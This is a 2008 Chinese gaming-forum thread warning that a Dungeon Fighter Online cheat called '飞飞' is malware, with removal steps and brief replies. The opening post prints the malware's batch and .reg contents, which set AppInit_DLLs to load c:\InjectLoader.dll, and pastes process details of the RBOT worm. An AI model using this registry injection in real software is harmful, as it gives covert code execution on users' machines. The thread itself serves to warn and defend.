[转帖]关于飞飞外挂,他是一个病毒。现在严禁会员传飞飞外挂到论坛上。

社区服务
高级搜索
猴岛论坛DNF地下城与勇士[转帖]关于飞飞外挂,他是一个病毒。现在严禁会员传飞飞外挂到论坛上。
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
11个回复

[转帖]关于飞飞外挂,他是一个病毒。现在严禁会员传飞飞外挂到论坛上。

楼层直达
chinaoy

ZxID:1967628

等级: 上士
签名一定要个性吗?
举报 只看楼主 使用道具 楼主   发表于: 2008-10-22 0
莪是亲身经历过的,莪是在11点多下的飞飞,运行时杀毒软件还提示有病毒,莪就没在乎,知道是个外挂难免带些小病毒,就在10月22日1:30左右,莪把号挂起,去朋友家大概10分钟的样子回来,发现莪的机子上的3个杀度软件被关掉,没在乎,再去打开的时候发现客户端不见了,而且QQ,DNF,网站全部关掉,再次运行QQ等,已经运行不起,现在莪已经重装系统。请不要用飞飞辅佐软件。
  @78@ @78@

下面的病毒资料
@echo off
regedit /s start.reg
exit



start.reg的内容如下

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"DeviceNotSelectedTimeout"="15"
"GDIProcessHandleQuota"=dword:00002710
"Spooler"="yes"
"swapdisk"=""
"TransmissionRetryTimeout"="90"
"USERProcessHandleQuota"=dword:00002710
"AppInit_DLLs"="c:\\InjectLoader.dll"


这个是飞飞外挂里那个只运行一次的.exe里的注册表程序。
貌似是要注入一个服务键InjectLoader.dll
怎么看都不是很安全啊。。。

后来我用DLL查看器查看了里面的DLL注入程序。
这是在百度百科里搜索到的。。
spooler.exe
  spooler.exe 进程信息
  进程名称: spooler.exe
  详细名称: WIN32.RBOT Worm Module
  具体描述: spooler.exe is a process associated with the WIN32.RBOT Worm.
  能否关闭: 病毒进程,强烈建议关闭!
  后台进程: 是
  其他信息: 无
  进程文件: spooler.exe or spooler
  进程名称: WIN32.RBOT Worm Module
  描述:
  spooler.exe is a process belonging to WIN32.RBOT Worm. This process is a security risk and should be removed from your system.
  Recommendation for spooler.exe:
  DISABLE AND REMOVE spooler.exe IMMEDIATELY. This process is most likely a virus or trojan.
  Author:
  Part Of: WIN32.RBOT Worm
  安全等级 (0-5): 4
  间谍软件: No
  病毒: Yes ( Remove spooler.exe )
  木马: Yes ( Remove spooler.exe )
  Memory Usage: N/A
  System Process: No
  Background Process: Yes
  Uses Network: Yes
  Hardware Related: No
  Common spooler.exe Errors: N/A

一般情况下spooler.exe为灰鸽子生成的木马程序。(有人说是打印机的程序,打印机的是spoolsv.exe,不是spooler.exe。。spooler.exe是清醒变种病毒运行时复制的文件,通常出现在系统目录下,会向外发送大量的带毒邮件以阻塞网络。建议使用杀毒软件进行扫描。)看到有些用过的朋友,机器变的极其缓慢,而且杀毒软件和防火墙都无法更新。这都是中木马、病毒的表现。)所以大家还是小心为妙。。。


以下为解决方法:
首先进入系统服务,你会发现有个可疑服务Print Spool Handler (描述:Mapping the end point spool to the begin point)查看属性页,回发现该服务的可执行文件路径是%system32%\spooler.exe,没错,就是这个了,把这个服务停止,然后把其启动类型设为禁用。接着在启动项里把勾去掉。然后进入安全模式下删除这个文件。并在注册表内搜索删除之。。

chinaoy

ZxID:1967628

等级: 上士
签名一定要个性吗?
举报 只看该作者 沙发   发表于: 2008-10-22 0
昨晚在这里下了,还好没用啊
as97057464

ZxID:2154277

等级: 新兵
举报 只看该作者 板凳   发表于: 2008-10-22 0
沙发支持下楼主
ydh619

ZxID:1909618

等级: 列兵
举报 只看该作者 地板   发表于: 2008-10-22 0
自己在用,叫人不要用,有毒,封号的,全家死
弄的老子昨天挂了一阵
大奶妹

ZxID:2067979

等级: 少校
看不見伱的笑,,莪怎麼睡的着.,
举报 只看该作者 4楼  发表于: 2008-10-22 0
左飞飞,右飞飞,哎,满城风雨,!
oh,眼淚,
眼淚都是莪的體會,.
成長的滋味
w3305

ZxID:1559325

等级: 上校
举报 只看该作者 5楼  发表于: 2008-10-22 0
谢谢楼主分享
a279901148

ZxID:1724271

等级: 少尉
举报 只看该作者 6楼  发表于: 2008-10-22 0
  谢谢    我就查点中毒
249292227

ZxID:1988834

等级: 中校
举报 只看该作者 7楼  发表于: 2008-10-22 0
引用
引用第5楼w3305于2008-10-22 11:44发表的  :
谢谢楼主分享
wzd3856189

ZxID:2046903

等级: 大校
期待新G BZ快出新G啊
举报 只看该作者 8楼  发表于: 2008-10-22 0
拿刀.
qichao2030

ZxID:1602438

等级: 列兵
男人越帅,死得越快.男人越丑,活得越久
举报 只看该作者 9楼  发表于: 2008-10-22 0
拿刀
dczws

ZxID:1943152

等级: 少将

举报 只看该作者 10楼  发表于: 2008-10-22 0
引用
引用第2楼as97057464于2008-10-22 11:41发表的  :
沙发支持下楼主
dczws

ZxID:1943152

等级: 少将

举报 只看该作者 11楼  发表于: 2008-10-22 0
引用
引用第9楼qichao2030于2008-10-22 11:47发表的  :
拿刀
« 返回列表
发帖 回复